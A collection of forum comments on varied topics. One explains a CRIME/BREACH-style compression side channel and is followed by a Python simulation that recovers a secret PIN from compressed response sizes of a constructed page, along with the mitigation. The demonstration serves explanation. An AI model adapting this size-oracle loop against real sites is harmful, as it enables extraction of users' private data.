
Comment Re:All the data means all the data (Score 1) 304

No, it isn't. At least in the US, posting medical records publicly is only illegal if you yourself are a "covered entity," e.g. a member of the health-care team bound by law to keep medical records private. If you're a journalist (or some other random person like Julian Assange) and someone gives you a medical record, you're legally free to post it everywhere you want. The only person breaking the law is the person at the start of the chain. This is similar to how government leaks work--Woodward and Bernstein are within their rights to publish, and the only person breaking the law is Deep Throat.


Comment Re:If You're not rich, have a bright future! (Score 1) 367

The labor might be that cheap, but do they work strict 40 hour work weeks, use OSHA approved equipment, can afford a livable quality of life (support a family comfortably, take vacations twice a year), get fully paid health insurance, dental etc for that $5-7 a day?

Comment Synopsis (Score 5, Informative) 102

I'm not a fan of that article summary.

New summary:
It is the same as CRIME, but we're using your browser's performance timing JS API as the man-in-the-middle.

A review:
Stick sensitive info into compressed stuff, and you make that sensitive info less private. If the encryption is zlib-like, then the attacker can guess the information quite quickly-- a good compressor compresses substrings, not just the whole thing.
That means that if you have an SSN in there, the attacker can guess some substrings of your SSN, and the response won't be much bigger.
Guesses that don't share substrings with your SSN will be larger-- the attacker can reject those as bad guesses and not try those substrings again.

With HTTP2's HPACK compressor (only used for info in the headers), this side-channel is eliminated-- only an exact guess of the data will allow this to happen. This is completely unrelated, however, to someone using entity-body compression with HTTP2. If you mix sensitive data with everything else in the compressed-entity body... side channel attacks galore!

A mitigation: Don't put the sensitive data in the same resource as the non-sensitive data, and then don't compress the sensitive data.
HTTP2 makes this cheaper. If sites do this, then these attacks simply do not work any better than the brute-force guessing would.
Ensuring that this happens (no sensitive data compressed) isn't necessarily the easiest thing...

Another obvious one is disable the timing API for 3rd party stuff. This is not as effective theoretically, but it is way easier to deploy and makes these kinds of attacks require an external 3rd party.
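The "guess a substring, watch the compressed size" loop described in the comment above, as an added example that is not part of the original post or the article it discusses. Everything in it is constructed: a page that reflects one attacker-controlled query string and also embeds a secret "pin=4821", compressed with zlib/deflate. The attacker observes only the compressed length (in the real attack that length is inferred through the browser's timing API; here len() stands in for it). The compressor is pinned to deflate's fixed Huffman table so that each wrong guess costs exactly one extra literal, i.e. exactly one byte; with the default dynamic tables the signal is noisier and real attacks add padding or repeat guesses to separate it from noise. The same code shows the mitigation from the comment: when the secret is left out of the compressed resource, every guess produces the same size and the recovery loop has nothing to work with.

```python
"""Compression side channel of the CRIME/BREACH family (constructed example).

The attacker controls one reflected string in the page, knows the field name
"pin=", and learns only the compressed response size.  A correct guess lets the
LZ77 stage match one more byte of the secret against the reflected copy, so the
response shrinks by one byte relative to every wrong guess.
"""
import zlib

SECRET_PIN = "4821"      # constructed sensitive value embedded in the page body
PREFIX = "pin="          # field name the attacker already knows
ALPHABET = "0123456789"  # candidate characters for each unknown position


def render_page(reflected: str, include_secret: bool = True) -> str:
    """Constructed HTML: repetitive markup, one reflected parameter, one secret."""
    filler = "<li>item</li>" * 20
    secret = ("<span>" + PREFIX + SECRET_PIN + "</span>") if include_secret else ""
    return (
        "<html><body><ul>" + filler + "</ul>"
        + "<p>search: " + reflected + " ;</p>"
        + secret
        + "</body></html>"
    )


def compressed_size(body: str) -> int:
    # Z_FIXED pins deflate to the static Huffman table: one extra 8-bit
    # literal is then exactly one extra output byte.  With the default
    # dynamic tables the difference per guess fluctuates and has to be
    # averaged or padded out; the attack still works, just with more queries.
    co = zlib.compressobj(level=6, strategy=zlib.Z_FIXED)
    return len(co.compress(body.encode()) + co.flush())


def oracle(reflected: str, include_secret: bool = True) -> int:
    """What the attacker observes: the compressed response length in bytes."""
    return compressed_size(render_page(reflected, include_secret))


def recover_secret(length: int = 4, include_secret: bool = True) -> str:
    """Extend the known prefix one character at a time.

    The candidate whose reflected guess yields the smallest response shares the
    longest substring with the secret.  Raises if no single candidate wins,
    which is what happens when the secret is not in the compressed resource.
    """
    known = ""
    for _ in range(length):
        sizes = {c: oracle(PREFIX + known + c, include_secret) for c in ALPHABET}
        best = min(sizes.values())
        winners = [c for c, size in sizes.items() if size == best]
        if len(winners) != 1:
            raise RuntimeError("no usable size difference; nothing to recover")
        known += winners[0]
    return known


def attack_succeeds(include_secret: bool = True) -> bool:
    """True when the size channel alone reproduces SECRET_PIN."""
    try:
        return recover_secret(include_secret=include_secret) == SECRET_PIN
    except RuntimeError:
        return False


if __name__ == "__main__":
    print("sizes for first-digit guesses:",
          {c: oracle(PREFIX + c) for c in ALPHABET})
    print("recovered:", recover_secret())
    print("secret kept out of the compressed resource, attack works:",
          attack_succeeds(include_secret=False))
```

Each query costs the attacker one observation, so a 4-digit value falls in at most 40 requests instead of 10000; the same loop works for any alphabet as long as the known prefix plus one guessed character gives the compressor a match of at least three bytes.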

Comment Re:What's the big problem? (Score 1) 675

I either do a straight line or an X. The card (and thus my purchases with it) is protected against fraud. What's the point of signing it? The signature is absolutely not cross checked against any kind of database for validity. I don't have time to be wasting on a fancy signature that nobody will ever look at and doesn't matter.

Comment San Francisco's Transbay Tube (Score 3, Interesting) 84

San Francisco's Transbay Tube does this. It's a bunch of segments bolted together, and then it was weighted down with thousands of pounds of granite fill/gravel and they pumped all the water out of it. The bottom of the San Francisco bay is pretty flat and muddy compared to Norway, I suspect, so they just let it sit on the bottom, rather than precariously suspend it in the water(?!?)

Comment Re:Fuck you Motorola/Lenovo (Score 1) 162

They finally pushed out a... June? 2016 security patch to my Moto X. I think this fixed the bug where the radio would get woken up from sleep mode, but not return to sleep when done, which ate up my battery like crazy. The Moto X was my first Non-Nexus phone in years... now I'm back with a Nexus 5x, at least Google patches their shit.

Comment Re:Analogue vs Digital, and DRM (Score 2) 536

USB Type-C allows for analog out to a pair of dumb headphones. You can either connect a pair of native Type-C dumb headphones (dumbphones?) or a 3.5mm set of dumbphones to a $3 adapter.
There will also be digital headphones and powered dumbphones, but USB Type-C can totally be used to pass an analog signal from inside the phone, directly to a tiny set of speakers strapped to your head. There's no DRM in analog audio signals.
